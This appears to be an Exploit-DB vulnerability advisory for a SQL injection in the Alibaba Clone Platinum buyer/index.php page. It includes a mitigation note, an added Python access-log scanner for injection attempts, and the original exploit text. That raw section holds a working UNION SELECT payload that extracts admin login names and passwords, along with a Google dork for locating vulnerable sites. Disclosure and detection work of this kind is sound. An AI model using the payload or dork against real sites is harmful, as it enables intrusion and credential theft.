Vendor: Alibaba Clone Platinum
By: GuN
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Alibaba Clone Platinum
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability

Alibaba Clone Platinum does not sanitize the 'ProductID' and 'BuyerID' parameters of the 'buyer/index.php' page, so an attacker can inject SQL into the query they are placed in. With a UNION SELECT statement this can be exploited to disclose the admin credentials.

Mitigation:

Input to the 'ProductID' and 'BuyerID' parameters should be validated before it reaches the SQL query, which prevents this SQL injection.
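As an added example (not part of the advisory or of the Alibaba Clone Platinum code), the following Python check scans web-server access-log lines for requests to buyer/index.php whose ProductID or BuyerID value is not a plain numeric identifier, which is the shape of the injection described above. The log lines, the /shop/ install path and the assumption that both IDs are non-negative integers are constructed for this example.

```python
from __future__ import annotations
import re
from urllib.parse import parse_qs, urlsplit

# The advisory names these buyer/index.php parameters as injectable; for this
# example both are assumed to carry non-negative integer identifiers only.
NUMERIC_PARAMS = ("ProductID", "BuyerID")

# Request field of a combined-format access log line: "GET /path?query HTTP/1.1"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Used only to label a finding; the numeric check is what decides.
SQL_KEYWORDS = re.compile(r"\b(union|select|from|concat)\b", re.IGNORECASE)

def inspect_target(target: str) -> list[str]:
    """Return findings for one request target (path plus query string)."""
    parts = urlsplit(target)
    if not parts.path.endswith("/buyer/index.php"):
        return []  # scoped to the script the advisory covers
    findings = []
    # parse_qs percent-decodes and turns '+' into spaces, as PHP does for $_GET
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in NUMERIC_PARAMS:
            continue
        for value in values:
            if value == "" or (value.isascii() and value.isdigit()):
                continue  # blank or plain numeric id: expected input
            kind = "sqli-pattern" if SQL_KEYWORDS.search(value) else "non-numeric"
            findings.append(f"{name}: {kind}: {value[:60]}")
    return findings

def scan_log(lines: list[str]) -> list[tuple[str, str]]:
    """Return (client_ip, finding) pairs for suspicious buyer/index.php requests."""
    hits = []
    for line in lines:
        match = LOG_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        for finding in inspect_target(match.group("target")):
            hits.append((client_ip, finding))
    return hits

# Constructed sample log lines for the example (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [14/May/2010:10:00:01 +0100] "GET /shop/buyer/index.php?ProductID=1234&BuyerID=77 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [14/May/2010:10:00:07 +0100] "GET /shop/buyer/index.php?ProductID=-22+UNION+all+SELECT+1,2,version()--&BuyerID= HTTP/1.1" 200 6210',
    '10.0.0.9 - - [14/May/2010:10:00:09 +0100] "GET /shop/buyer/index.php?BuyerID=77%27 HTTP/1.1" 500 312',
]
```

Requests to other scripts are deliberately ignored, so widen the path check if the same parameters are used elsewhere in the install.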

Exploit-DB raw data:

# Title: Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability 
# Author: GuN
# Published: 2010-14-05 
# Verified: yes 


........../¯¯/).................(\¯¯\..........
........./¯.//....................\\.¯\.........
......../..//.........GuN........\\..\........
../´¯`/'

 /´`\...WJA-TEAM../´`\ '\`´¯\...
./

 '/ / / /¨/¯\................./¯\¨\ \ \ \' \.
(
 '( ´ ´ ¯\/'' )................( ''/\¯ ` ` )' )
-----------------------------------------------------------------------
  Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author      : GuN
Location    : Tunisia - Tunis - Lycée el Omrane
Time Zone   : GMT +1:00
----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : Alibaba Clone Platinum
Vendor      : http://www.alibabaclone.com/
Price       : $699 USD
Google Dork : allinurl:buyer/index.php?ProductID=
Overview    : B2B trading Marketplace Script clone of alibaba. Marketplace script is a wonderful solution to launch your own business to business and b2c site. Script is packed with a lot of features to provide a very sound foundation to your trading portal site.

  

Exploit:
~~~~~~~
-22+UNION+all+SELECT+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,concat(LoginID,0x3a,password)GuN,37,38,39,40,41+from+admin--

  

  SQLi GuN:
  ~~~~~~~
   
  http://127.0.0.1/[path]/buyer/index.php?ProductID=&BuyerID=

  

GreetZ To: Sparta <==> Amino <==> HassenO <==> Anis 
<3 Inter  <==> Volc4n0 <==> Vbspiders.com

  

  Contact:

XGuN@Hacker.Ps

  ~~~~

  XGuN@ViP.Cn

  ~~~~